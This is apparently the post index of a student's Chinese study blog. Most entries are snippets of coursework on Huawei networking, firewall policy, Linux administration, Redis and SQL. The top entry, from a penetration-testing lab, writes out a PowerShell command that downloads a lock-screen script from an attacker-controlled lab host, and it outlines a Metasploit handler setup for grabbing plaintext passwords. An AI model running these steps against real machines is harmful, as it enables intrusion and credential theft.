weixin_61349094的博客

原创 中心渗透Ⅱ

shell powershell (new-object System.Net.WebClient).DownFile('http://192.168.17.132:9999/lock-screen.ps1','c:\lock-screen.ps1') #下载锁屏脚本。调用 exploit/multi/handler 模块配置 HTTP Payload，为该 payload 的 IP 和 端口设置成 Metasploit Framework 所在主机 IP，端口自定义即可。管理员重新登录后再抓取明文密码。

原创 中心渗透Ⅰ

LMhash：LM哈希是早期windows版本中使用的一种较弱的哈希算法，当用户密码小于15个字符的时候，windows会首先将其转化为大写，然后使用LM哈希算法进行加密，然而由于LM哈希算法存在已知漏洞，因此现代Windows系统默认禁用了LM哈希，或者仅当密码长度超过14个字符时才使用它。因此，在大多数情况下，NT哈希是更可靠和安全的密码存储方式。当使用LM哈希算法时，不管原始密码是什么，只要密码长度不足14个字符，LM哈希的第一部分（即对应密码前7个字符的哈希）都会包含这个固定的前缀。

原创 IPsec

在FW5和FW3之间建立一条IPSEC通道,保证10.0.2.0/24网段可以正常访问到192.168.1.0/24。

原创 防御保护Ⅵ

实现二者的互补，达到安全传输的目的。分组加密 --- 也被称为块加密，与流加密不同的是，分组加密会将数据流分为若干组，使用的密钥会略长于一组的长度，例如8位二进制为一组，密钥可以为11位，然后进行异或运算，第一组少的三位用随机数来代替，算出第一组的密文值后，再随机抽取三位数添加到下一组，再进行异或运算。应用内容的过滤 --- 比如微博或者抖音提交帖子的时候，包括我们搜索某些内容的时候，其事只都是通过HTTP之类的协议中规定的动作来实现的，包括邮件附件名称，FTP传递的文件名称，这些都属于应用内容的过滤。

原创 防御保护Ⅴ

5.办公区上网用户限制流量不超过60M，其中销售部人员在其基础上限制流量不超过30M，且销售部一共10人，每人限制流量不超过3M。7.多出口环境基于带宽比例进行选路，但办公区中的10.0.2.20只能通过电信链路访问外网。1.办公区设备可以通过电信和移动两条链路上网，且需要保留一个公网ip不能用来转换。6.销售部保证email应用在办公时间至少可以使用10M的带宽，每人至少1M。2.分公司设备可以通过两条链路访问到dmz区域的http服务器。3.分公司内部客户端可以通过公网地址访问到内部服务器。

原创 防御保护Ⅳ

并且，如果配置的过 载保护阈值，则一条链路达到过载保护阈值之后，除了已经创建会话表的流量依然可以 从该接口通过外，该接口将不再参与智能选路，需要新建会话表的流量将从其余链路中 按照比例转发。服务器认证 --- 和第三方的认证服务器对接，登录时，防火墙将登录信息发送给第三方服务器，之后由第三方服务器来进行验证，通过则反馈给防火墙，防火墙放行。防火墙的控制 带内管理 --- 通过网络环境对设备进行控制 --- telnet，ssh，web --- 登录设备和被登 录设备之间网络需要联通。其余链路依旧不工作。

原创 防御保护Ⅲ

2、办公区全天可以访问服务器区，其中，10.0.2.20可以访问FTP服务器和HTTP服务器，10.0.2.10仅可以ping通10.0.3.10；办公区全天可以访问服务器区，其中10.0.3.20可以访问FTP服务器和HTTP服务器,10.0.3.10仅可以ping通10.0.1.10。1、生产区在工作时间（9：00---18：00）内可以访问服务区，仅可以访问http服务器；办公区：源地址办公区的10.0.3.20，目标地址是DMZ区的所有服务器。生产区只能访问HTTP服务器，不能访问FTP服务器。

原创 防御保护Ⅱ

在g0/0/0接口配置service-manage all permit。让虚拟网卡IP与防火墙接口g0/0/0在同一网段。1,防火墙向下使用子接口分别对应生产区和办公。2.通过CLoud1和FW1打开防火墙。2,所有分区设备可以ping通网关。

原创 网络安全防御保护

防御手段：重要网站/APP的密码一定要独立 、电脑勤打补丁，安装一款杀毒软件、尽量不使用IE浏览器、使用正版软件、不要在公共场合使用公共无线做有关私密信息的事、自己的无线AP，用安全的加密方式（如WPA2），密码复杂些、电脑习惯锁屏等。信息安全：防止任何对数据进行未授权访问的措施，或者防止造成信息有意无意泄漏、破坏、丢失等问题的发生，让数据处于远离危险、免于威胁的状态或特性。通信保密阶段---计算机安全阶段--- 信息系统安全---网络空间安全APT攻击---高级持续性威胁。

原创 RHCE Ⅳ

原创 RHCE Ⅲ

3、使用curl命令访问第二题的web服务，看能否正常访问，如果能正常访问，则返回web server is running；如果不能正常访问，返回12状态码。2、判断web服务是否运行（1、查看进程的方式判断该程序是否运行，2、通过查看端口的方式判断该程序是否运行），如果没有运行，则启动该服务并配置防火墙规则。1.判断当前磁盘剩余空间是否有20G，如果小于20G，则将报警邮件发送给管理员，每天检查一次磁盘剩余空间。

原创 RHCE Ⅱ

网站需求： 1.基于域名www.openlab.com可以访问网站内容为 welcome to openlab!2.给该公司创建三个子界面分别显示学生信息，教学资料和缴费网站，基于www.openlab.com/student 网站访问学生信息，www.openlab.com/data网站访问教学资料，www.openlab.com/money网站访问缴费网站。1.配置ssh免密登陆：客户端主机通过redhat用户基于秘钥验证方式进行远程连接服务器的root用户。最后通过密钥登录本地服务器。

原创 RHCE Ⅰ

​三.指定在每天凌晨4：00将该时间点之前的系统日志信息（/var/log/messages ）备份到目录下/backup，备份后日志文件名显示格式logfileYY-MM-DD-HH-MM。而crond只在指定的时间开始执行计划任务，然后停止运行，直到下次执行时再次启动。2. atd只需在指定的时间运行一次任务，然后就将其从系统中删除。3. atd管理的任务是用at命令添加到计划任务中的，而crond管理的任务是通过crontab命令添加到计划任务中的。一.atd和crond两个任务管理程序的区别。

原创 HCIP Ⅶ

划分网段192.168.1.0 / 24和192.168.2.0 / 24。PC2可以访问PC4、PC5、PC6；但PC4可以访问PC5，不能访问PC6。PC3可以正常访问PC2、PC4、PC5、PC6。1.进行IP配置和DHCP配置。PC通过DHCP获取IP。pc5ping不通pc6。

原创 HCIP Ⅵ

一，二：三：四：五：

原创 HCIP Ⅴ

5、DR 为R3，BDR 为R1 ，这样R3变成了hub，只能R3和R1通信，R2不能和R1通信，所以需要修改优先级，让R1为DR，无BDR。2、R1、R2、R3需要各写一条缺省指向ISP，让连接ISP的三个路由的三个接口IP地址互相通信。R1 -R2 -R3之间使用MGRE网络，为hub-spoke 网络结构，R1为hub端 ，3、R1、R2、R3之间做MGRE，R1为hub，R2、R3为spoke。4、R1、R2、R3、R4、R6、启用ospf协议。9、增加area1 安全性，可以做ospf认证。

原创 HCIP Ⅳ

路由LSA：描述本路由器上接口的路由信息 拓扑LSA：描述路由器之间的连接状态3.更新方式：触发更新+30分钟的链路状态刷新 4.更新地址：组播和单播更新，组播地址：224.0.0.5（ALL SPF router） 224.0.0.6 （ALL DR router）5.支持路由认证6.支持手工汇总7.支持区域划分8.OSPF 比较消耗设备资源。1.主从选举DBD：比较双方的router-id ，router-id大的一方为主（master ），小的一方为从（slave）；主用于控制LSA的交互。

原创 HICP Ⅲ

全网可达ospf宣告满足。

原创 HCIP Ⅱ

要求：R1-R2-R3-R4-R5 RIP 100运行版本2；R6-R7 RIP 200 运行版本11.使用合理IP地址规划网络，各自创建环回接口2.R1创建环回 172.16.1.1/24 172.16.2.1/24 172.16.3.1/243.要求R3使用R2访问R1环回4.减少路由条目数量，增加路由传递安全性5.R5创建一个环回模拟运营商，不能通告6.R1 telnet R2环回实际telnet 到R7上7.R6-R7路由器不能学习到达R1环回路由8.全网可达。

原创 HCIP Ⅰ

3.Fragment Offset，分片偏移，指的时该分片距离没分片完整数据包头部的偏移值（比如第一个分片的偏移值就是0，第二个分片的偏移值则为第一个分片的大小），占13bit，该字段对包含分段的上层数据包的 IP 包赋予序号。3.Type of Service，服务类型（Tos），对流量进行标记用于做QS（服务质量，用作网络优化，重要流量优先传递），大小为8个bit，利用DSCP（区分服务）方法标记前6位bit（64种不同的服务类别），后2个bit用于ECN（显示拥塞通道）

原创 20230410

dump.rdb是由Redis服务器自动生成的。默认情况下 每隔一段时间redis服务器程序会自动对数据库做一次遍历，把内存快照写在一个叫做“dump.rdb”的文件里，这个持久化机制叫做SNAPSHOT。有了SNAPSHOT后，如果服务器宕机，重新启动redis服务器程序时redis会自动加载dump.rdb，将数据库状态恢复到上一次做SNAPSHOT时的状态。1.使用watch和事务,完成取款业务。适合于备份，用于灾难恢复。2 dump.rdb的作用。RDB是Redis的一种。

原创 数据库整理

1_sql语句分为几类?在MySQL数据库中，SQL语句主要可以划分为以下几类DDL(Data Definition Language):数据定义语言，定义对数据库对象(库、表、列、索引)的操作。CREATE、DROP、ALTER、RENAME、 TRUNCATE等DML(Data Manipulation Language): 数据操作语言，定义对数据库记录的操作。INSERT、DELETE、UPDATE、SELECT等。

原创 linux第三次作业

linux

原创 rhcsa第三次作业

rhcsa

原创 rhcsa基本的命令和密码破解的过程

rhcsa基本的命令和密码破解的过程

原创 JAVASE第二天

Java

原创 JAVASE第一天

java

原创 RHCSA第六天

一：1、755-》对应什么权限：rwxr-xr-x2、660-》对应什么权限：rw-rw----3、644-》对应什么权限：rw--w--w--4、6755-》对应什么权限：6755设置SUID和SGID rwxr-xr-x5、1644-》对应什么权限：1644设置 stickyrw-rw--w-7、1666->对应什么权限：文件大小 单位：数据块 block＝512字节Linux数据块可调整：存大文件时用大数据块，存小文件时用小数据块。8、7777-> 对应什么

原创 RHCSA/Linux基础第四天

1.使用tar命令对文件进行打包压缩与解压缩：使用gzip方式对文件进行压缩，并指定压缩名为 tar_gzip.tar.gz使用bzip2方式对文件夹进行压缩,并指定压缩名为 tar_bzip2.tar.bz2使用xz方式对文件进行压缩,并指定压缩名为 tar_xz.tar.xz新建文件file1.txt，file2.txt，file3.txt对文件file1.txt和file2.txt，进行压缩(使用gzip方式)，排除file3.txt(即不对file3进行压...

原创 RHCSA/Linux基础第三天

1.使用whereis 查找 locate命令 使用which查找whereis命令 使用locate查找rm命令2.find命令使用： 使用find命令在当前路径下查找所有的普通文件 使用find命令查找当前路径下的file1.txt，file2.txt,file3.txt 使用find命令查找文件所有者为root的普通文件 使用find命令查找修改时间在1天以内的普通文件3.cut命令使用：给定文件cut_dat...

原创 RHCSA/Linux基础第三天

1.创建目录test 使用两种方式在test目录中创建文本文件text1.txt, text2.txt 使用Vim在文件text1.txt中写入Welcome to my Linux.You are the best.This is my first file to create on linux 设置行号，并将文本中my替换成your，将文件另存为new_test1.txt 将test中的文件拷贝到test2目录 将test2目录中的test1.tx...

原创 20220320第二天作业

1.使用timedatectl查看时间状态 ， 列出所有已知时区 ，修改时区为列出时区的某一个2.使用wget命令在https://www.pearvideo.com/这个网站下载任意一个视频3.Linux中的文件类型以及符号的表示-: 普通文件- 常规文件，即filed 目录文件b block device 即块设备文件，如硬盘;支持以block为单位进行随机访问c character device 即字符设备文件，如键盘支持以char...

原创 RHCSA第一天：环境搭建，访问命令行，简单命令

1.部署Linux环境： 安装Vmware之后，在windows会产生两个虚拟网卡：vmnet1， vmnet8 部署Linux：需要有网卡，必须要知道root用户的密码，和你普通的用户的用户名和密码 远程连接配置：xshell/mobaxterm/finalshell 连接linux虚拟机2.命令： echo 输出PS1的内容：This is my first time to use echo command. echo $PS1 result is [\u@\h ...

原创 HCIA-南航金城-20211204第二次作业

HCIA第二次作业

原创 HCIA-南航金城-20211204

HCIA-第一次笔记20211204